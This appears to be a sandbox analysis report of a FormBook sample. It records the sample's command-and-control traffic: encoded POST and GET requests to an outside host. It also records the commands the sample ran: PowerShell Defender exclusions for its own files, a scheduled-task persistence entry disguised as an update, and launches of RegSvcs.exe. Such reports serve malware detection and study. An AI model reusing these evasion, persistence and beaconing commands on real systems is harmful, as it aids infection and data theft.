                                                                Dec 9, 2024 08:46:09.816914082 CET1236INData Raw: 6e 79 75 6e 2e 74 6f 70 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 6c 69 6e 67 64 69 61 6e 79 75 6e 32 34 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79
                                                                Data Ascii: nyun.top", "https://0dyos.com");mappings.set("lingdianyun24.xyz", "https://0dyos.com");mappings.set("www.lingdianyun30.xyz", "https://0dyos.com");mappings.set("lingdianyun28.top", "https://0dyos.com");mappings.set("www.0dy02.to
                                                                Dec 9, 2024 08:46:09.817003965 CET224INData Raw: 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 6c 69 6e 67 64 69 61 6e 79 75 6e 30 32 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70
                                                                Data Ascii: ://0dyos.com");mappings.set("lingdianyun02.xyz", "https://0dyos.com");mappings.set("lingdianyun23.xyz", "https://0dyos.com");mappings.set("www.00dianyun1.xyz", "https://0dyos.com");mappings.set("www.lingdiany
                                                                Dec 9, 2024 08:46:09.817646980 CET1236INData Raw: 75 6e 32 34 2e 74 6f 70 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 6c 69 6e 67 64 69 61 6e 79 75 6e 32 36 2e 74 6f 70 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79
                                                                Data Ascii: un24.top", "https://0dyos.com");mappings.set("lingdianyun26.top", "https://0dyos.com");mappings.set("www.0dyvs.top", "https://0dyos.com");mappings.set("www.lingdianyun20.top", "https://0dyos.com");mappings.set("www.lingdianyun1
                                                                Dec 9, 2024 08:46:09.817708015 CET224INData Raw: 67 73 2e 73 65 74 28 22 30 64 79 65 73 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 6c 69 6e 67 64 69 61 6e 79 75 6e 37 2e 78 79 7a 22 2c 20 22 68 74 74
                                                                Data Ascii: gs.set("0dyes.xyz", "https://0dyos.com");mappings.set("lingdianyun7.xyz", "https://0dyos.com");mappings.set("www.lingdianyun07.top", "https://0dyos.com");mappings.set("www.vdoos.com", "https://0dyos.com");map
                                                                Dec 9, 2024 08:46:09.934771061 CET1236INData Raw: 70 69 6e 67 73 2e 73 65 74 28 22 30 30 64 69 61 6e 79 75 6e 31 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 6c 69 6e 67 64 69 61 6e 79 75 6e 31 37 2e 74
                                                                Data Ascii: pings.set("00dianyun1.xyz", "https://0dyos.com");mappings.set("lingdianyun17.top", "https://0dyos.com");mappings.set("www.lingdianyun15.top", "https://0dyos.com");mappings.set("lingdianyun9.xyz", "https://0dyos.com");mappings.s


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                33192.168.2.1249764199.192.23.123801344C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 9, 2024 08:46:25.634076118 CET793OUTPOST /d5up/ HTTP/1.1
                                                                Host: www.learnnow.info
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate
                                                                Connection: close
                                                                Content-Length: 202
                                                                Cache-Control: max-age=0
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Origin: http://www.learnnow.info
                                                                Referer: http://www.learnnow.info/d5up/
                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                Data Raw: 45 62 66 78 36 3d 67 36 45 6d 44 72 78 4f 55 4c 57 71 70 6e 75 42 52 75 37 35 71 34 67 75 45 4d 66 6a 33 70 41 47 69 43 4b 45 64 6c 57 37 39 68 4d 52 4e 4a 41 44 34 62 63 4e 52 5a 7a 35 76 55 63 41 49 43 4a 4d 59 4b 64 6e 37 74 32 51 77 6f 34 70 75 2f 2f 34 72 32 44 6a 37 7a 34 35 5a 35 42 52 2b 2b 41 57 45 63 35 54 69 34 69 6e 51 56 63 72 70 76 31 70 73 4d 31 35 74 71 44 63 31 73 66 62 65 36 4e 4d 56 72 31 55 71 4d 7a 4d 69 51 47 66 49 6d 64 30 57 54 6b 4b 6c 62 54 64 30 4c 7a 6e 7a 57 43 71 2f 44 7a 53 6e 73 30 4a 31 46 52 58 34 6e 47 39 41 39 77 50 52 2b 73 54 70 75 43 2f 6c 6b 2f 76 77 41 3d 3d
                                                                Data Ascii: Ebfx6=g6EmDrxOULWqpnuBRu75q4guEMfj3pAGiCKEdlW79hMRNJAD4bcNRZz5vUcAICJMYKdn7t2Qwo4pu//4r2Dj7z45Z5BR++AWEc5Ti4inQVcrpv1psM15tqDc1sfbe6NMVr1UqMzMiQGfImd0WTkKlbTd0LznzWCq/DzSns0J1FRX4nG9A9wPR+sTpuC/lk/vwA==
                                                                Dec 9, 2024 08:46:26.853106022 CET533INHTTP/1.1 404 Not Found
                                                                Date: Mon, 09 Dec 2024 07:46:26 GMT
                                                                Server: Apache
                                                                Content-Length: 389
                                                                Connection: close
                                                                Content-Type: text/html
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                34192.168.2.1249765199.192.23.123801344C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 9, 2024 08:46:28.303020954 CET813OUTPOST /d5up/ HTTP/1.1
                                                                Host: www.learnnow.info
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate
                                                                Connection: close
                                                                Content-Length: 222
                                                                Cache-Control: max-age=0
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Origin: http://www.learnnow.info
                                                                Referer: http://www.learnnow.info/d5up/
                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                Data Raw: 45 62 66 78 36 3d 67 36 45 6d 44 72 78 4f 55 4c 57 71 71 48 2b 42 64 76 37 35 72 59 67 74 64 73 66 6a 35 4a 41 43 69 43 47 45 64 6b 69 4e 36 58 6b 52 4e 6f 77 44 2f 65 6f 4e 57 5a 7a 35 67 45 64 4b 56 53 4a 62 59 4b 51 53 37 6f 57 51 77 6f 73 70 75 38 72 34 72 6c 37 67 71 7a 34 2f 53 5a 42 54 36 2b 41 57 45 63 35 54 69 38 79 65 51 56 45 72 31 50 46 70 76 74 31 36 6b 4b 44 62 6a 38 66 62 4e 71 4e 49 56 72 31 32 71 4e 65 62 69 53 2b 66 49 69 5a 30 58 43 6b 46 38 4c 54 54 36 72 7a 31 38 6a 66 38 6d 53 4c 74 75 2b 38 41 32 6d 4e 54 77 42 4c 6e 66 50 34 5a 45 39 34 65 6b 35 37 50 6f 6e 43 6d 72 46 77 57 76 64 61 4a 2b 38 6f 37 4c 38 50 4f 39 4c 47 58 63 58 41 3d
                                                                Data Ascii: Ebfx6=g6EmDrxOULWqqH+Bdv75rYgtdsfj5JACiCGEdkiN6XkRNowD/eoNWZz5gEdKVSJbYKQS7oWQwospu8r4rl7gqz4/SZBT6+AWEc5Ti8yeQVEr1PFpvt16kKDbj8fbNqNIVr12qNebiS+fIiZ0XCkF8LTT6rz18jf8mSLtu+8A2mNTwBLnfP4ZE94ek57PonCmrFwWvdaJ+8o7L8PO9LGXcXA=
                                                                Dec 9, 2024 08:46:29.526635885 CET533INHTTP/1.1 404 Not Found
                                                                Date: Mon, 09 Dec 2024 07:46:29 GMT
                                                                Server: Apache
                                                                Content-Length: 389
                                                                Connection: close
                                                                Content-Type: text/html
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                35192.168.2.1249766199.192.23.123801344C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 9, 2024 08:46:30.962975025 CET1826OUTPOST /d5up/ HTTP/1.1
                                                                Host: www.learnnow.info
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate
                                                                Connection: close
                                                                Content-Length: 1234
                                                                Cache-Control: max-age=0
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Origin: http://www.learnnow.info
                                                                Referer: http://www.learnnow.info/d5up/
                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                Data Raw: 45 62 66 78 36 3d 67 36 45 6d 44 72 78 4f 55 4c 57 71 71 48 2b 42 64 76 37 35 72 59 67 74 64 73 66 6a 35 4a 41 43 69 43 47 45 64 6b 69 4e 36 58 73 52 4b 61 34 44 35 35 45 4e 58 5a 7a 35 6a 45 64 4a 56 53 4a 61 59 4b 59 65 37 6f 62 6e 77 72 55 70 76 63 33 34 38 6b 37 67 7a 6a 34 2f 64 35 42 65 2b 2b 41 48 45 64 4a 58 69 34 57 65 51 56 45 72 31 4e 64 70 34 73 31 36 69 4b 44 63 31 73 66 74 65 36 4e 6b 56 72 4d 42 71 4e 71 4c 69 69 65 66 49 43 4a 30 56 77 4d 46 6a 62 53 31 39 72 79 6d 38 6a 61 69 6d 54 6d 63 75 2f 49 35 32 68 68 54 30 6c 75 75 47 64 49 6d 66 72 67 48 6b 65 76 47 6f 77 2b 54 76 33 51 4a 69 4d 57 57 39 38 55 6f 57 76 53 43 6f 5a 79 48 66 6a 77 69 36 6d 59 71 4e 49 50 4c 54 50 4b 55 48 76 4e 63 6d 51 54 56 5a 72 7a 4a 2b 45 76 6e 36 68 70 6d 54 4c 6b 56 58 33 4a 4d 66 30 76 59 53 54 6b 63 50 35 35 51 76 6d 66 75 2b 51 54 5a 52 48 48 4c 7a 4b 50 75 6f 4b 33 4b 55 74 4e 41 59 36 64 54 5a 4b 35 51 71 79 34 70 66 49 67 76 71 42 2f 69 67 55 7a 58 57 48 7a 6e 6e 38 50 32 64 57 70 54 66 70 5a 65 [TRUNCATED]
                                                                Data Ascii: Ebfx6=g6EmDrxOULWqqH+Bdv75rYgtdsfj5JACiCGEdkiN6XsRKa4D55ENXZz5jEdJVSJaYKYe7obnwrUpvc348k7gzj4/d5Be++AHEdJXi4WeQVEr1Ndp4s16iKDc1sfte6NkVrMBqNqLiiefICJ0VwMFjbS19rym8jaimTmcu/I52hhT0luuGdImfrgHkevGow+Tv3QJiMWW98UoWvSCoZyHfjwi6mYqNIPLTPKUHvNcmQTVZrzJ+Evn6hpmTLkVX3JMf0vYSTkcP55Qvmfu+QTZRHHLzKPuoK3KUtNAY6dTZK5Qqy4pfIgvqB/igUzXWHznn8P2dWpTfpZeVOadfFQWeE404pVH4GKzbnG1m+WZYs+0TwRTOSht0LmjW3rL+knBCY432zUU/Dy1DLcBhRVkMoJq5VpbKPSaGnybsmX+hqu6EF2gZtb0877eAKtIpSQzuWi91V6LIERdu6vqGwsJ4quhxgIV93xHwvKS/PcLIiaS2irCrsyCWOYN8iLiMCQjlG2bnHo4mrefuwjc6g2hauRWW7Fj2VSEDlCglJeq7YXvHifC0nZPs2SYp3oTUsQpO1Lu56aqS9xiZEF3kkB+OV44MwbvMaSsNST4QhSlGUQ0WUHRGPAuFhpRVFwMcQJsCFPXfsSry5aHxZGJlg6/YZa55LRGd3nHlGF8tnXy2Bf6r3Cza1h3Bp3nPMW0hkQuQIOk6kswjELDIIuktsJDpDqnBB6jxHQXM8315nlg34NytQ0j5Jlh9kiu/pOCZsVobeBJrVNtQYT2P/MI4mn/gwqj+/GfuVwHfsQkPVbLo0PP1BuphFovODUBjlX2xrhC4CNYkm2B5ZSNdvKAu/zKg3sR52BHMwFWMpdtkVhJyqDg6f8K3LTwnh5+BRc+i33+dqeuMLVAWPDe8ySdQOKPalv/y/ojWmjeOPyt38fwduNPVsQ3uICH6Kn1DqQFcR5Z56wOqYXJ1iI4auXNyx3LsPx5AuaVRGcoxwXSe4hF9WUYlL [TRUNCATED]
                                                                Dec 9, 2024 08:46:32.175741911 CET533INHTTP/1.1 404 Not Found
                                                                Date: Mon, 09 Dec 2024 07:46:31 GMT
                                                                Server: Apache
                                                                Content-Length: 389
                                                                Connection: close
                                                                Content-Type: text/html
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                36192.168.2.1249767199.192.23.123801344C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 9, 2024 08:46:33.610960007 CET533OUTGET /d5up/?Ebfx6=t4sGAbB2VavWqiiIadPUj68mTJ7Q54MapR6mUVHY3SwgNZVHyOwsTaauiAAffAhHdKJKrrjT+NERuNHfq0vx0hlOGpFc29QbO/AvwrqpPk1c7Mdu4vpn2Z4=&Njld=LDTtwxbX2vi0G HTTP/1.1
                                                                Host: www.learnnow.info
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Connection: close
                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                Dec 9, 2024 08:46:34.828695059 CET548INHTTP/1.1 404 Not Found
                                                                Date: Mon, 09 Dec 2024 07:46:34 GMT
                                                                Server: Apache
                                                                Content-Length: 389
                                                                Connection: close
                                                                Content-Type: text/html; charset=utf-8
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                Statistics

                                                                CPU Usage

                                                                Click to jump to process

                                                                Memory Usage

                                                                Click to jump to process

                                                                High Level Behavior Distribution

                                                                Click to dive into process behavior distribution

                                                                Behavior

                                                                Click to jump to process

                                                                System Behavior

                                                                General

                                                                Target ID:0
                                                                Start time:02:42:32
                                                                Start date:09/12/2024
                                                                Path:C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe"
                                                                Imagebase:0x260000
                                                                File size:842'760 bytes
                                                                MD5 hash:B5554D36A6FCA18D2BBA3D41D4070539
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:low
                                                                Has exited:true

                                                                General

                                                                Target ID:3
                                                                Start time:02:42:38
                                                                Start date:09/12/2024
                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe"
                                                                Imagebase:0x550000
                                                                File size:433'152 bytes
                                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:4
                                                                Start time:02:42:38
                                                                Start date:09/12/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff704000000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:5
                                                                Start time:02:42:38
                                                                Start date:09/12/2024
                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe"
                                                                Imagebase:0x550000
                                                                File size:433'152 bytes
                                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:6
                                                                Start time:02:42:38
                                                                Start date:09/12/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff704000000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:7
                                                                Start time:02:42:38
                                                                Start date:09/12/2024
                                                                Path:C:\Windows\SysWOW64\schtasks.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rlJvZXSinaRi" /XML "C:\Users\user\AppData\Local\Temp\tmp1B5C.tmp"
                                                                Imagebase:0x1a0000
                                                                File size:187'904 bytes
                                                                MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:8
                                                                Start time:02:42:38
                                                                Start date:09/12/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff704000000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:9
                                                                Start time:02:42:39
                                                                Start date:09/12/2024
                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                Imagebase:0x300000
                                                                File size:45'984 bytes
                                                                MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:10
                                                                Start time:02:42:39
                                                                Start date:09/12/2024
                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                Imagebase:0xbc0000
                                                                File size:45'984 bytes
                                                                MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.2621801367.00000000015F0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.2615113559.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.2624347397.00000000019B0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:11
                                                                Start time:02:42:42
                                                                Start date:09/12/2024
                                                                Path:C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe
                                                                Imagebase:0xcd0000
                                                                File size:842'760 bytes
                                                                MD5 hash:B5554D36A6FCA18D2BBA3D41D4070539
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Antivirus matches:
                                                                • Detection: 100%, Joe Sandbox ML
                                                                • Detection: 63%, ReversingLabs
